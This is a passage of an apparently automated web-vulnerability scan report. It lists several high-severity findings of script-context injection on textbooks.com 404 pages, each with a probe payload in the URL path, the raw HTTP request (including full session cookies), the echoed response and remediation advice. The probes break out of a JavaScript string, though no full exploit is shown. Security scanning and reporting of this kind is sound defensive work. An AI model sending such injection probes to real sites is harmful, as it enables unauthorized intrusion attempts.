Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/M/a3252';2a20df4a898'

</script>
...[SNIP]...

1.28. http://www.textbooks.com/Catalog/P/Medicine.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/P/Medicine.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10b2f'%3b8290bd8ef43 was submitted in the REST URL parameter 1. This input was echoed as 10b2f';8290bd8ef43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog10b2f'%3b8290bd8ef43/P/Medicine.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3638
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:28 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog10b2f';8290bd8ef43/P/Medicine.php'

</script>
...[SNIP]...

1.29. http://www.textbooks.com/Catalog/P/Medicine.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/P/Medicine.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ecf4'%3b7c7953083f1 was submitted in the REST URL parameter 3. This input was echoed as 1ecf4';7c7953083f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/P/1ecf4'%3b7c7953083f1 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:29 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/P/1ecf4';7c7953083f1'

</script>
...[SNIP]...

1.30. http://www.textbooks.com/Catalog/R/Reference-Materials.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/R/Reference-Materials.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49ac2'%3bcbb7a349c97 was submitted in the REST URL parameter 1. This input was echoed as 49ac2';cbb7a349c97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog49ac2'%3bcbb7a349c97/R/Reference-Materials.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3649
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:37 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog49ac2';cbb7a349c97/R/Reference-Materials.php'

</script>
...[SNIP]...

1.31. http://www.textbooks.com/Catalog/R/Reference-Materials.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/R/Reference-Materials.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b08e6'%3be7126123a86 was submitted in the REST URL parameter 3. This input was echoed as b08e6';e7126123a86 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/R/b08e6'%3be7126123a86 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:38 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/R/b08e6';e7126123a86'

</script>
...[SNIP]...

1.32. http://www.textbooks.com/Catalog/S/Social-Sciences.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/S/Social-Sciences.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cbf9'%3b4bd41d8fcd1 was submitted in the REST URL parameter 1. This input was echoed as 9cbf9';4bd41d8fcd1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog9cbf9'%3b4bd41d8fcd1/S/Social-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3645
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:50 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog9cbf9';4bd41d8fcd1/S/Social-Sciences.php'

</script>
...[SNIP]...

1.33. http://www.textbooks.com/Catalog/S/Social-Sciences.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/S/Social-Sciences.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76e55'%3b5cea322eca4 was submitted in the REST URL parameter 3. This input was echoed as 76e55';5cea322eca4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/S/76e55'%3b5cea322eca4 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
